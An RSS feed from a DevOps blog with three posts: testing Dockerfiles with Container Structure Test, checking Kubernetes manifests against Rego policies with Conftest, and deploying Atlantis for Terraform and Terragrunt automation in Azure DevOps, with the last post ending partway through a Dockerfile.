<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[John Reese]]></title><description><![CDATA[Go . Kubernetes . DevOps]]></description><link>https://reese.dev/</link><image><url>https://reese.dev/favicon.png</url><title>John Reese</title><link>https://reese.dev/</link></image><generator>Ghost 2.0</generator><lastBuildDate>Thu, 09 Apr 2026 13:33:06 GMT</lastBuildDate><atom:link href="https://reese.dev/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Testing Containers with Container Structure Test]]></title><description><![CDATA[<p><img src="https://reese.dev/content/images/2020/09/containers.jpg" alt="containers"></p>
<p>It is no secret that when we are writing software, tests are a critical component to ensure the code <em>actually</em> does what we say it does. It is so critical that most languages come with testing frameworks. JavaScript has testing frameworks such as <a href="https://mochajs.org/">mocha</a> and <a href="https://jasmine.github.io/">jasmine</a>. Go ships with its</p>]]></description><link>https://reese.dev/testing-containers-with-container-structure-test/</link><guid isPermaLink="false">5f663f69fdd9cb45ead965c2</guid><category><![CDATA[testing]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Sat, 06 Jun 2020 17:27:00 GMT</pubDate><media:content url="https://reese.dev/content/images/2020/09/containers.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://reese.dev/content/images/2020/09/containers.jpg" alt="Testing Containers with Container Structure Test">
<p>It is no secret that when we are writing software, tests are a critical component to ensure the code <em>actually</em> does what we say it does. It is so critical that most languages come with testing frameworks. JavaScript has testing frameworks such as <a href="https://mochajs.org/">mocha</a> and <a href="https://jasmine.github.io/">jasmine</a>. Go ships with its own testing capabilities provided by the <a href="https://golang.org/pkg/testing/">testing package</a>. And while writing tests in these languages is an accepted standard practice, all too often we forget that there is more to getting an application onto production than the app itself.</p>
<p><a href="https://docs.docker.com/engine/reference/builder/">Dockerfiles</a> play a big part in how we ship software at my company. We use them heavily in our build pipelines to run <a href="https://docs.microsoft.com/en-us/azure/devops/pipelines/process/container-phases?view=azure-devops">containerized jobs</a>, as well as serving as the distribution mechanism that gets the software onto our Kubernetes clusters. We like to say, &quot;If it's code, we can test it,&quot; and writing <code>Dockerfiles</code> is no exception.</p>
<h2 id="atraditionalapproachtowritingdockerfiles">A traditional approach to writing Dockerfiles</h2>
<p>When tasked with writing a <code>Dockerfile</code>, there are defined requirements that the <code>Dockerfile</code> needs to satisfy. Binaries may be required to run linting tools, environment variables need to be set, and files have to exist at specific paths. Consider the <code>Dockerfile</code> that was shown in an earlier blog post, <a href="https://reese.dev/deploying-atlantis-to-kubernetes-with-azure-devops/">Deploying Atlantis to Kubernetes with Azure DevOps</a>:</p>
<pre><code class="language-Dockerfile">FROM golang:1.13 as builder
RUN apt-get update \
  &amp;&amp; apt-get install unzip

# Install terraform-bundle
RUN git clone \
  --depth 1 \
  --single-branch \
  --branch &quot;v0.12.0&quot; \
  https://github.com/hashicorp/terraform.git \
  $GOPATH/src/github.com/hashicorp/terraform
RUN cd $GOPATH/src/github.com/hashicorp/terraform \
  &amp;&amp; go install ./tools/terraform-bundle

# Download plugins
COPY terraform-bundle.hcl .
RUN terraform-bundle package -os=linux -arch=amd64 terraform-bundle.hcl
RUN mkdir /go/tmp \
  &amp;&amp; unzip /go/terraform_*-bundle*_linux_amd64.zip -d /go/tmp

FROM runatlantis/atlantis:v0.11.1
ENV TF_IN_AUTOMATION=&quot;true&quot;
ENV TF_CLI_ARGS_init=&quot;-plugin-dir=/home/atlantis/.atlantis/plugin-cache&quot;

# Install Azure CLI
ARG AZURE_CLI_VERSION=&quot;2.0.74&quot;
RUN apk add py-pip \
  &amp;&amp; apk add --virtual=build gcc libffi-dev musl-dev openssl-dev python-dev make
RUN pip --no-cache-dir install azure-cli==${AZURE_CLI_VERSION}

# Install Terragrunt
ARG TERRAGRUNT_VERSION=&quot;v0.23.2&quot;
RUN curl -L https://github.com/gruntwork-io/terragrunt/releases/download/${TERRAGRUNT_VERSION}/terragrunt_linux_amd64 \
  -o /usr/local/bin/terragrunt \
  &amp;&amp; chmod +x /usr/local/bin/terragrunt
  
# Copy plugins
COPY .terraformrc /root/.terraformrc
COPY --chown=atlantis:atlantis --from=builder /go/tmp /home/atlantis/.atlantis/plugin-cache
RUN mv /home/atlantis/.atlantis/plugin-cache/terraform /usr/local/bin/terraform

# Configure git
COPY .gitconfig /home/atlantis/.gitconfig
COPY azure-devops-helper.sh /home/atlantis/azure-devops-helper.sh

# Copy server-side repository config
COPY repository-config.yaml /home/atlantis/repository-config.yaml

CMD [&quot;server&quot;, &quot;--repo-config=/home/atlantis/repository-config.yaml&quot;]

LABEL org.opencontainers.image.title=&quot;Atlantis Environment&quot;
LABEL org.opencontainers.image.description=&quot;An environment to support executing Terragrunt operations with Atlantis&quot;

LABEL binary.atlantis.version=&quot;v0.11.1&quot;
LABEL binary.terragrunt.version=${TERRAGRUNT_VERSION}
LABEL binary.azure-cli.version=${AZURE_CLI_VERSION}
</code></pre>
<p>This <code>Dockerfile</code> requires:</p>
<ul>
<li>Terraform plugins to support different types of infrastructure.</li>
<li>The Terragrunt CLI.</li>
<li>Two environment variables, <code>TF_IN_AUTOMATION</code> and <code>TF_CLI_ARGS_init</code>.</li>
<li>Git configuration that points to an Azure DevOps helper script (and the script itself).</li>
<li>A global configuration for repositories that use Atlantis.</li>
</ul>
<p>To begin writing this <code>Dockerfile</code>, knowing that we'll need to install <a href="https://github.com/hashicorp/terraform/tree/master/tools/terraform-bundle">terraform-bundle</a> (using Go), as well as install the <code>unzip</code> package to unzip the generated bundle, we could jump right into it and create a <code>Dockerfile</code>:</p>
<pre><code class="language-Dockerfile">FROM golang:1.13 as builder
RUN apt-get update \
  &amp;&amp; apt-get install unzip
</code></pre>
<p>To verify that the base image exists and that the unzip package was successfully installed, we execute the <code>docker run</code> command with an interactive terminal to explore the contents of the produced container.</p>
<pre><code class="language-shell">$ docker build . -t testing:latest
$ docker run -it testing:latest
root@fb06cc45835c:/go# unzip
UnZip 6.00 of 20 April 2009, by Debian. Original by Info-ZIP.
</code></pre>
<p>We know the <code>unzip</code> package successfully installed because after executing the binary, we get a response back that includes the version of the binary and the date it was built.</p>
<p>If the <code>unzip</code> package did not install successfully, the container would throw an error stating that <code>unzip</code> is an unknown command.</p>
<pre><code class="language-shell">$ docker run -it testing:latest
root@fb06cc45835c:/go# unzip
bash: unzip: command not found
</code></pre>
<p>This cycle of adding commands to the <code>Dockerfile</code>, building the image, running the container, and exploring the structure of the container would need to continue until we met all of the requirements. While this process will eventually satisfy every requirement, much of the verification is manual. Worse, when the requirements change, as they tend to do, it becomes incredibly challenging to be confident that a change didn't inadvertently break something else.</p>
<h2 id="abetterwayforwardwithcontainerstructuretest">A better way forward with Container Structure Test</h2>
<p><a href="https://github.com/GoogleContainerTools/container-structure-test">Container Structure Test</a> is a tool developed by Google that enables us to test the structure of a container. I'm not sure how they came up with the name, but what's important is that it removes the need to test <code>Dockerfiles</code> manually!</p>
<p>Container Structure Test supports four different types of tests: <code>command</code>, <code>file existence</code>, <code>file content</code>, and <code>metadata</code>. Each type of test can validate a different aspect of a container. It does this by running the container for you, automatically, and testing whether or not the structure of the container meets the defined requirements in the test file.</p>
<p><em>NOTE: If you would like a deeper dive into the internals of Container Structure Test, the folks over at Google put together a <a href="https://opensource.googleblog.com/2018/01/container-structure-tests-unit-tests.html">blog post</a> that explains the different types of tests in greater detail, as well as how to get the most out of the tool.</em></p>
<h2 id="writingadockerfile">Writing a Dockerfile</h2>
<p>When equipped with Container Structure Test, rather than creating a new <code>Dockerfile</code>, adding commands, building the container, running the container, and manually exploring the container—we define the requirements upfront.</p>
<p>In the previous example, the first known requirement was that the <code>unzip</code> package had to be present inside of the container. To define this requirement as a test case within Container Structure Test, we use a <code>command</code> test:</p>
<pre><code class="language-yaml">schemaVersion: 2.0.0

commandTests:
- name: unzip
  command: unzip
  args: [&quot;-v&quot;]
</code></pre>
<p>To test the <code>Dockerfile</code>, pass the name of the built image along with the location of the test file to the <code>container-structure-test</code> CLI.</p>
<p><em>NOTE: It's possible to save some keystrokes, as well as time, by combining the <code>docker build</code> and <code>container-structure-test test</code> commands so that every time the <code>Dockerfile</code> changes, a new image is built and the test suite is run against the most recently built image.</em></p>
<pre><code class="language-shell">$ docker build . -t testing:latest \
  &amp;&amp; container-structure-test test --image testing:latest --config unzip-test.yaml

===================================
============= RESULTS =============
===================================
Passes:      1
Failures:    0
Duration:    443.548204ms
Total tests: 1
</code></pre>
<p>While it's possible to write a single test and then change your <code>Dockerfile</code> until that test passes (which is reminiscent of Test-Driven Development), another valid approach is to define <em>all</em> of your requirements first and build the <code>Dockerfile</code> from the complete test suite. Either is acceptable; use whichever method makes the most sense for your style!</p>
<p>To complete our example, here is the full test suite for the Atlantis container image:</p>
<pre><code class="language-yaml">schemaVersion: 2.0.0

# Validate the environment contains the required tooling
commandTests:
- name: Atlantis
  command: atlantis
  args: [&quot;version&quot;]

- name: Terraform
  command: terraform
  args: [&quot;version&quot;]
  expectedOutput: [&quot;Terraform v0.12.24&quot;]

- name: Terragrunt
  command: terragrunt
  args: [&quot;--version&quot;]

- name: Azure CLI
  command: az
  args: [&quot;--version&quot;]

# Validate the required configuration files exist
fileExistenceTests:
- name: Server Configuration
  path: /home/atlantis/repository-config.yaml
  shouldExist: true

- name: Azure DevOps Helper
  path: /home/atlantis/azure-devops-helper.sh
  shouldExist: true

- name: Terraform Plugin Cache
  path: /home/atlantis/.atlantis/plugin-cache
  shouldExist: true

# Validate checkpoint functionality is off
fileContentTests:
- name: Terraform Checkpoint Disabled 
  path: /home/atlantis/.terraformrc
  expectedContents: ['disable_checkpoint = true']

# Validate container environment is configured as expected
metadataTest:
  env:
    - key: TF_IN_AUTOMATION
      value: &quot;true&quot;
    - key: TF_CLI_ARGS_init
      value: -plugin-dir=/home/atlantis/.atlantis/plugin-cache
</code></pre>
<h2 id="integratingcontainerstructuretestintoyourworkflow">Integrating Container Structure Test into your workflow</h2>
<p>While using Container Structure Test for local development can save a lot of time when first writing the <code>Dockerfile</code>, the benefits don't stop there!</p>
<p>After creating the <code>Dockerfile</code>, we have a defined set of requirements that the <code>Dockerfile</code> must adhere to. Having this set of requirements enables us to run Container Structure Test at any point in the future and verify, automatically, that no regressions or unexpected changes occurred inside of the container. A software component that exists inside of a container image could change its version at any time or, even worse, be removed altogether. If you depend on specific components, and particular versions, add tests for them!</p>
<p>In the case of Atlantis, the maintainers are free to <a href="https://github.com/runatlantis/atlantis/commit/a9873aeb585c9e03e89c188feb9dd0e7086ebdf3">change the version of Terraform</a> inside of the container at any time during their release cycle. Updating from Atlantis <code>0.12</code> to <code>0.13</code> should be trivial, but because the version of Terraform used to deploy infrastructure <a href="https://github.com/hashicorp/terraform/issues/19290#issuecomment-436012086">needs to be taken into consideration</a>, we need to be made aware whenever that version changes.</p>
<pre><code class="language-yaml">schemaVersion: 2.0.0

commandTests:
- name: Terraform
  command: terraform
  args: [&quot;version&quot;]
  expectedOutput: [&quot;Terraform v0.12.21&quot;]
</code></pre>
<p>This <code>command</code> test will fail the test suite when the version of Terraform inside of the container changes from <code>v0.12.21</code>. Now, upgrading Atlantis is as simple as bumping the version and re-running the test suite.</p>
<p>Integrating Container Structure Test into your workflow for developing <code>Dockerfiles</code> automates much of the manual exploration that was previously required to verify the structure of the container. As a bonus, after the <code>Dockerfile</code> is first built, we have a test suite that we can run every time we need to make a change to the <code>Dockerfile</code> inside of our pipelines.</p>
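<p>As a sketch of that pipeline integration (the step layout, image name, and file paths here are illustrative, not taken from an actual pipeline), an Azure DevOps step could build the image and immediately run the suite against it:</p>
<pre><code class="language-yaml"># azure-pipelines.yml (illustrative snippet)
steps:
- script: |
    docker build . -t atlantis-environment:$(Build.BuildId)
    container-structure-test test \
      --image atlantis-environment:$(Build.BuildId) \
      --config structure-tests.yaml
  displayName: Build image and run structure tests
</code></pre>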
]]></content:encoded></item><item><title><![CDATA[Accelerated Feedback Loops when Developing for Kubernetes with Conftest]]></title><description><![CDATA[<p><img src="https://reese.dev/content/images/2020/09/kubernetes-conftest.jpg" alt="kubernetes"></p>
<p>The feedback loop when deploying to Kubernetes can be quite slow. Not only does the YAML need to be syntactically correct, but we need to ask ourselves:</p>
<p>Is the API version of our resource definition compatible with the version of Kubernetes that it is being deployed to? Kubernetes is constantly</p>]]></description><link>https://reese.dev/accelerated-feedback-loops-when/</link><guid isPermaLink="false">5f664156fdd9cb45ead965c5</guid><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Sat, 23 May 2020 17:35:00 GMT</pubDate><media:content url="https://reese.dev/content/images/2020/09/kubernetes-conftest.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://reese.dev/content/images/2020/09/kubernetes-conftest.jpg" alt="Accelerated Feedback Loops when Developing for Kubernetes with Conftest">
<p>The feedback loop when deploying to Kubernetes can be quite slow. Not only does the YAML need to be syntactically correct, but we need to ask ourselves:</p>
<p>Is the API version of our resource definition compatible with the version of Kubernetes that it is being deployed to? Kubernetes is constantly evolving, and over time, <a href="https://kubernetes.io/docs/reference/using-api/deprecation-policy/#deprecating-parts-of-the-api">deprecates older APIs</a> in favor of newer ones. A deployment definition may successfully apply on one version of Kubernetes, but not another.</p>
<p>Are the resources that depend on one another configured properly? For example, when creating a <a href="https://kubernetes.io/docs/concepts/services-networking/service/">Service</a>, you can specify <a href="https://kubernetes.io/docs/concepts/overview/working-with-objects/labels/">selectors</a> for which Pods the traffic should ultimately be routed to. In the event that a Service is configured with selectors, but is unable to find any Pods, this mistake would not be known until the Service is deployed to the cluster. What makes this case even more challenging is that this configuration is technically valid but would require additional testing to verify if the traffic is flowing as expected.</p>
<p><a href="https://github.com/kubernetes-sigs/kind">Kind</a> aims to help solve a lot of these concerns by allowing developers to spin up a Kubernetes cluster on their local machine, verify their changes, and tear it down with ease. However, it can still take a fair amount of time to bring up a Kind cluster, apply the manifests, and test the outcome.</p>
<p>While these concerns can be caught relatively early, there are additional considerations, especially in the realm of security, that may not be immediately obvious and could go unnoticed until they become a <a href="https://unit42.paloaltonetworks.com/non-root-containers-kubernetes-cve-2019-11245-care/">serious problem</a>.</p>
<p>To catch a lot of these problems ahead of time without the need of a Kubernetes cluster, including Kind, it's possible to validate all deployments to Kubernetes against policies.</p>
<h2 id="anexamplepolicy">An example policy</h2>
<p>Most of the policies that I write are written in <a href="https://www.openpolicyagent.org/docs/latest/policy-language/">Rego</a>, a policy language that is interpreted by the <a href="https://www.openpolicyagent.org/">Open Policy Agent</a> (OPA). To better understand Rego, and how we can leverage it to write policies for Kubernetes, consider the following scenario:</p>
<p>In our cluster, we want to be able to quickly identify which team owns a given Namespace. This is useful for notifying teams about overutilization, cost reporting, problematic pods, and more. To accomplish this, we require that all Namespaces be created with an <code>owner</code> label.</p>
<p>To show how we can use Rego to validate Kubernetes manifests, let's create a namespace without an <code>owner</code> label:</p>
<pre><code class="language-yaml">apiVersion: v1
kind: Namespace
metadata:
  name: missinglabel
</code></pre>
<p>We'll also need a policy. A Rego policy to enforce this requirement would look like the following:</p>
<pre><code class="language-javascript">package main

violation[msg] {
  input.kind == &quot;Namespace&quot;
  not input.metadata.labels[&quot;owner&quot;]
  
  msg := &quot;All namespaces must contain an owner label&quot;
}
</code></pre>
<p><em>NOTE: The <code>input</code> prefix is special when writing policies. It refers to the input document which is one of the base documents provided by the OPA <a href="https://www.openpolicyagent.org/docs/latest/philosophy/#the-opa-document-model">document model</a>.</em></p>
<p>This policy defines a single <a href="https://www.openpolicyagent.org/docs/latest/policy-language/#rules">rule</a> called <code>violation</code>. While the order of the statements within the rule does not matter, it can be easier to understand how a rule is evaluated if expressed in this way.</p>
<p><strong>Line 04</strong> first evaluates whether the input has a <code>kind</code> property whose value is equal to &quot;Namespace&quot;. If the <code>kind</code> is not a Namespace, or the <code>kind</code> property does not exist at all, the input will not be considered a violation. The example Namespace has a <code>kind</code> property with a value of &quot;Namespace&quot;, so this statement returns true.</p>
<p><strong>Line 05</strong> then checks whether a key named <code>owner</code> exists in the labels map within the manifest's metadata. Because the statement is negated with <code>not</code>, it returns true only when the label is missing. In the example Namespace, there is no <code>owner</code> label, so this statement also returns true.</p>
<p><strong>Line 07</strong> is an assignment operation, which always succeeds and binds the violation message to <code>msg</code>.</p>
<p>After all of the statements have been evaluated, the rule itself can be evaluated. In order for a rule to be true, <em>all</em> of the statements inside of the rule must also be true. In this example, all of the statements returned true so the example Namespace would trigger the violation.</p>
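<p>For contrast, consider a Namespace that carries the required label (the name and owner value below are illustrative). The negated statement on line 05 would evaluate to false, so the rule as a whole would not fire:</p>
<pre><code class="language-yaml">apiVersion: v1
kind: Namespace
metadata:
  name: payments
  labels:
    owner: payments-team
</code></pre>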
<h2 id="validatingkubernetesmanifestswithconftest">Validating Kubernetes manifests with Conftest</h2>
<p>It is important to note that the Open Policy Agent always expects <em>JSON</em> in order to evaluate policies. Kubernetes, on the other hand, speaks YAML. At its core, the Open Policy Agent is just a policy engine—it's intended to be generic and fit many use cases.</p>
<p><a href="https://github.com/open-policy-agent/conftest">Conftest</a> is a tool that focuses on the user experience when interacting with OPA. Most notably, it handles converting multiple file formats such as <code>.hcl</code>, <code>Dockerfile</code>, and even <code>yaml</code> into JSON so that it can be interpreted by OPA. Because Conftest is just a CLI that can be downloaded onto your machine, or even pipelines, it's possible to verify manifests against your policies before ever creating a pull request.</p>
<p>Here is an example of a policy that enforces resource constraints on all containers:</p>
<pre><code class="language-javascript">package main

violation[msg] {
  container := input.spec.template.spec.containers[_]

  not container.resources.requests.cpu
  not container.resources.limits.cpu

  msg := sprintf(&quot;(%s): Container resource constraints must be specified.&quot;, [input.metadata.name])
}
</code></pre>
<p>If we were to run Conftest against the <a href="https://github.com/kubernetes/ingress-nginx/blob/master/deploy/static/provider/cloud/deploy.yaml">nginx ingress controller</a> bundle, we would see that it fails our policy:</p>
<pre><code class="language-shell">$ conftest test bundle.yaml

FAIL - (ingress-nginx): Container resource constraints must be specified.
</code></pre>
<p>We can then take the necessary steps to add the resource constraints into the Deployment so that our CI will allow the bundle onto our cluster.</p>
<h2 id="usingpolicybundles">Using policy bundles</h2>
<p>With Conftest, there's a lot of freedom in writing our own policies, but we also leverage many of the <a href="https://www.conftest.dev/sharing/">bundles</a> that the community has written.</p>
<p>A policy bundle can be thought of as a collection of Rego policies that can be pulled from a remote source. A lot of best practices are generic enough that it wouldn't make sense for everyone to have to write and rewrite the same policies. While the concept of bundling and distributing Rego policies for Kubernetes is still quite new, a couple of bundles already exist that have provided immediate value to our pipelines.</p>
<h3 id="verifyapicompatibilitywithdeprek8ion">Verify API compatibility with Deprek8ion</h3>
<p><a href="https://github.com/swade1987/deprek8ion">Deprek8ion</a> is a set of Rego policies that can be used to see if any of our resources are currently, or will be, deprecated in a given Kubernetes release.</p>
<pre><code class="language-shell">$ conftest pull github.com/swade1987/deprek8ion/policies -p policy/deprek8ion
$ conftest test bundle.yaml

WARN - ingress-nginx-admission: API admissionregistration.k8s.io/v1beta1
is deprecated in Kubernetes 1.19, use admissionregistration.k8s.io/v1 instead.
</code></pre>
<h3 id="findsecurityconcernswithkubesec">Find security concerns with Kubesec</h3>
<p><a href="https://kubesec.io/">Kubesec</a> is a set of Rego policies that can be used to see if any of our resources have any insecure configurations.</p>
<pre><code class="language-shell">$ conftest pull github.com/instrumenta/policies/kubernetes -p policy/kubesec
$ conftest test bundle.yaml

FAIL - Deployment ingress-nginx-controller does not drop all capabilities
FAIL - Deployment ingress-nginx-controller is not using a read only root filesystem
FAIL - Deployment ingress-nginx-controller allows privileged escalation
FAIL - Deployment ingress-nginx-controller is running as root
</code></pre>
<p>Conftest enables us to run policies against multiple resources at once—it is simple, yet powerful. No matter where the Kubernetes manifests originate, in house or in the open, we can automatically execute our policies to validate that they're compliant with our requirements. This approach allows us to automate our standards and security compliance concerns, freeing up developers to focus on other tasks.</p>
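<p>As a sketch of that automation (the policy sources and paths below are illustrative), running these checks in an Azure DevOps pipeline could look like:</p>
<pre><code class="language-yaml"># azure-pipelines.yml (illustrative snippet)
steps:
- script: |
    conftest pull github.com/swade1987/deprek8ion/policies -p policy/deprek8ion
    conftest test manifests/ -p policy
  displayName: Validate Kubernetes manifests against policies
</code></pre>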
<p>The general-purpose approach that the Open Policy Agent has taken, and the user experience that Conftest provides, enables near unlimited use cases for policy-based validation. While this post focuses a lot on validating Kubernetes manifests before deploying to a cluster, there are other possibilities as well. Notably continuous Kubernetes cluster auditing with <a href="https://github.com/open-policy-agent/gatekeeper">Gatekeeper</a>, and infrastructure security compliance with <a href="https://github.com/fugue/regula">Regula</a>.</p>
<p>Policy-based validation is still relatively new to the Kubernetes ecosystem, but it has already made a large impact on the community and I'm excited to see what's coming next in this space.</p>
]]></content:encoded></item><item><title><![CDATA[Deploying Atlantis to Kubernetes with Azure DevOps]]></title><description><![CDATA[<p><img src="https://reese.dev/content/images/2020/09/atlantis.jpg" alt="atlantis"></p>
<p>At my company, our initial adoption of <a href="https://www.terraform.io/">Terraform</a> was relatively painless. There weren't many teams writing infrastructure as code, and most of the changes that were being deployed through Terraform were new pieces of infrastructure that didn't have any dependencies.</p>
<p>As the number of teams using Terraform and managing their</p>]]></description><link>https://reese.dev/deploying-atlantis-to-kubernetes-with-azure-devops/</link><guid isPermaLink="false">5f6643e9fdd9cb45ead965c7</guid><category><![CDATA[azure]]></category><category><![CDATA[devops]]></category><category><![CDATA[tutorial]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Sun, 05 Apr 2020 17:45:00 GMT</pubDate><media:content url="https://reese.dev/content/images/2020/09/atlantis.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://reese.dev/content/images/2020/09/atlantis.jpg" alt="Deploying Atlantis to Kubernetes with Azure DevOps">
<p>At my company, our initial adoption of <a href="https://www.terraform.io/">Terraform</a> was relatively painless. There weren't many teams writing infrastructure as code, and most of the changes that were being deployed through Terraform were new pieces of infrastructure that didn't have any dependencies.</p>
<p>As the number of teams using Terraform and managing their own infrastructure grew, it became apparent that we needed to start putting some processes in place for a few reasons.</p>
<h2 id="collaborationwasdifficult">Collaboration was difficult</h2>
<p>In order for an engineer to verify their Terraform changes, they needed to be able to run <code>terraform plan</code> against live infrastructure. In most cases, this was done locally on their computer. While this approach made it easy for the engineer to get feedback, it presented other problems.</p>
<p>First, to successfully run a plan against the existing infrastructure, the engineer needed to have read access to all of the resources that they were making changes to. While this seemed reasonable, it became a problem of scale. Anyone who wanted to be an effective contributor to the code base needed read permissions in Azure. This quickly spiraled out of control and made managing access more difficult.</p>
<p>Secondly, we required multiple approvers for every pull request. This meant that not only did the engineer creating the pull request have to run a <code>terraform plan</code> against their changes, but so did the reviewer of the code. This typically meant that the result of a plan was pasted into the pull request so that everyone could see how each resource would be impacted.</p>
<h2 id="problemswithdifferentterraformclients">Problems with different Terraform clients</h2>
<p>Not all engineers have the same Terraform client installed on their computer. This can cause problems when working on the same backing Terraform state.</p>
<p>When executing a <code>terraform refresh</code> or <code>terraform apply</code> against the current state, the version of Terraform that was used is stored in the state file. Attempting to execute Terraform commands with an older Terraform client than what is listed in the state file will result in an error similar to the following:</p>
<pre><code class="language-text">Terraform doesn't allow running any operations against a state
that was written by a future Terraform version. The state is
reporting it is written by Terraform '0.12.0'
</code></pre>
<p>It's important to note that newer Terraform clients can change the syntax of the state file and how the results should be interpreted. Unfortunately, older Terraform clients will not know how to process this newer information and will need to be updated.</p>
<p>This means that if an engineer has Terraform <code>0.12.1</code> on their machine and executes a <code>refresh</code> or <code>apply</code>, the state will be updated to include version <code>0.12.1</code>, and anyone still running an older client will need to upgrade.</p>
<h2 id="planswentstale">Plans went stale</h2>
<p>Unfortunately, infrastructure can change at a moment's notice. Especially when multiple contributors are working on the same infrastructure. Consider the following scenario:</p>
<p>An engineer opens a pull request against a Terraform module and views the resulting plan. This plan highlights which resources will be created, destroyed, and/or updated. The plan looks good, but they decide to hold off on deploying the change because it's a Friday. Give that engineer a gold star!</p>
<p>Monday morning rolls around, and another engineer opens a pull request against the same module. Nothing seems out of the ordinary in the plan, so they apply the plan to production.</p>
<p>Now unfortunately for the first engineer in our scenario, their plan is no longer current.</p>
<p>At this point the original plan has lost most, if not all, of its value. Worse yet, if the original developer is unaware of the newly introduced change, an apply to production could cause problems. Lots of problems.</p>
<h2 id="thehomegrownsolution">The homegrown solution</h2>
<p>To address these problems, we wrote two PowerShell scripts (one for plan and one for apply) that would be executed on our build agents in Azure. These were wired up as policy checks in the repository, allowing us to run them on-demand or automatically with Azure <a href="https://docs.microsoft.com/en-us/azure/devops/service-hooks/services/webhooks?view=azure-devops">webhooks</a>.</p>
<p>When a pull request was created, the plan script would execute <code>terraform plan</code> against the changes and output the results of the plan to the pull request comment thread. This enabled reviewers to see the actual changes that were being introduced, without having to run the plan locally themselves. Awesome! Our first problem was solved.</p>
<p>Then, if the plan looked good and the appropriate reviewers approved the change, another script would handle the <code>terraform apply</code> step.</p>
<p>To solve the issue of stale plans, we added a policy that for a <code>terraform apply</code> to be executed, an associated plan needed to have been run no more than 30 minutes prior. It wasn't ideal, but it shortened the window of failure and gave us enough confidence that the original plan was still valid.</p>
<p>This approach worked well for us in the beginning, but as the amount of managed infrastructure and the number of teams using the solution grew, we started noticing gaps.</p>
<p>Rather than continuing to invest in our homegrown solution, we set out to find an alternative. If the title of the blog didn't already give it away, that solution was Atlantis.</p>
<h2 id="atlantis">Atlantis</h2>
<p><a href="https://www.runatlantis.io/">Atlantis</a> is a pull request automation tool that makes it easier for teams to manage and deploy their infrastructure.</p>
<p>Conveniently, it addresses the problems that we have already discussed:</p>
<ul>
<li>Visual <code>plan</code> and <code>apply</code> results in the pull request? <em>Check.</em></li>
<li>Each repository can set the required version of Terraform? <em>Check.</em></li>
<li>State locking to guarantee that plans stay relevant? <em>Check.</em></li>
</ul>
<p>Best of all, not only does it run on Kubernetes, it's an <a href="https://github.com/runatlantis/atlantis">open source project</a>!</p>
<h3 id="howitworks">How it works</h3>
<p>Atlantis is controlled by typing commands as comments on the pull request comment thread. Need to run <code>plan</code> against your pull request? Just comment on the pull request: <code>atlantis plan</code>. This will instruct Atlantis to get the plan for your changes and respond to the pull request with the result.</p>
<p>To get the plan, Atlantis will:</p>
<ol>
<li>
<p>Clone the repository to its data drive. If you're running Atlantis on Kubernetes, this will either be a local drive within the container (using a Deployment) or a Persistent Volume Claim (using a StatefulSet).</p>
</li>
<li>
<p>Lock the folder containing the changes and store the lock metadata to its data drive. This prevents plans from getting stale and prevents conflicts from multiple contributors.</p>
</li>
<li>
<p>Execute <code>terraform plan</code> against the folder containing the change.</p>
</li>
<li>
<p>Report the plan result as a comment in the pull request.</p>
</li>
</ol>
<p>With this approach, engineers no longer need to have access to the managed infrastructure. All plan and apply operations are handled within the pull request.</p>
<p>As a bonus, Atlantis also supports webhooks, which enable actions to be performed automatically, such as when a pull request is opened or the code within the pull request is modified.</p>
<h2 id="rollingoutatlantis">Rolling out Atlantis</h2>
<p>One of the first decision points during our roll-out of Atlantis was: <em>How are we going to host this?</em> Given that Atlantis runs inside of a Docker container, we had several options in front of us. Should we stand up an <a href="https://docs.microsoft.com/en-us/azure/container-instances/">Azure Container Instance</a>? Kubernetes? <em>Spoiler alert, it's probably Kubernetes.</em></p>
<p>Regardless of the final home for Atlantis, there are some preliminary steps that we had to complete.</p>
<h3 id="1createtheatlantisuser">1. Create the Atlantis user</h3>
<p>Atlantis needs a user account that is responsible for cloning the repositories and responding to pull requests. We decided to create a user named <code>atlantis</code>. <em>Completely original, I know.</em></p>
<p>We also created a Personal Access Token (PAT) for this user with the minimum scope possible:</p>
<ul>
<li><code>Code (Read &amp; Write)</code></li>
<li><code>Code (Status)</code></li>
</ul>
<h3 id="2configureatlantisforterragrunt">2. Configure Atlantis for Terragrunt</h3>
<p>We use <a href="https://github.com/gruntwork-io/terragrunt">Terragrunt</a> in our infrastructure repositories to help keep our infrastructure codebases DRY. Unfortunately, Atlantis does not support Terragrunt workflows out of the box and only provides a default workflow which executes basic Terraform commands.</p>
<p>However, Atlantis allows you to create your own workflows if you provide a <a href="https://www.runatlantis.io/docs/server-side-repo-config.html">server side repository configuration</a>. This enabled us to extend Atlantis and run <code>terragrunt</code> commands.</p>
<pre><code class="language-yaml">repos:
# The list of repositories Atlantis watches. Wildcards are supported.
- id: dev.azure.com/org/project/first-repo

  # Only allow &quot;apply&quot; comments if the PR is approved and can be merged
  apply_requirements: [approved, mergeable]
  workflow: terragrunt

# Instead of terraform commands, run these for plan and apply
workflows:
  terragrunt:
    plan:
      steps:
      - run: terragrunt init -input=false -no-color
      - run: terragrunt plan -input=false -no-color -out $PLANFILE
    apply:
      steps:
      - run: terragrunt apply -input=false -no-color $PLANFILE
</code></pre>
<h3 id="3customizetheatlantisimage">3. Customize the Atlantis image</h3>
<p>We <a href="https://en.wikipedia.org/wiki/Air_gap_(networking)">air gap</a> our infrastructure pipelines, so it's not possible to download plugins on demand. Instead, we leverage Terraform's plugin cache and download the plugins ahead of time.</p>
<p>To accomplish this, we wrote our own custom <code>Dockerfile</code> that was based on the original Atlantis image:</p>
<pre><code class="language-Dockerfile">FROM golang:1.13 as builder
RUN apt-get update \
  &amp;&amp; apt-get install unzip

# Install terraform-bundle
RUN git clone \
  --depth 1 \
  --single-branch \
  --branch &quot;v0.12.0&quot; \
  https://github.com/hashicorp/terraform.git \
  $GOPATH/src/github.com/hashicorp/terraform
RUN cd $GOPATH/src/github.com/hashicorp/terraform \
  &amp;&amp; go install ./tools/terraform-bundle

# Download plugins
COPY terraform-bundle.hcl .
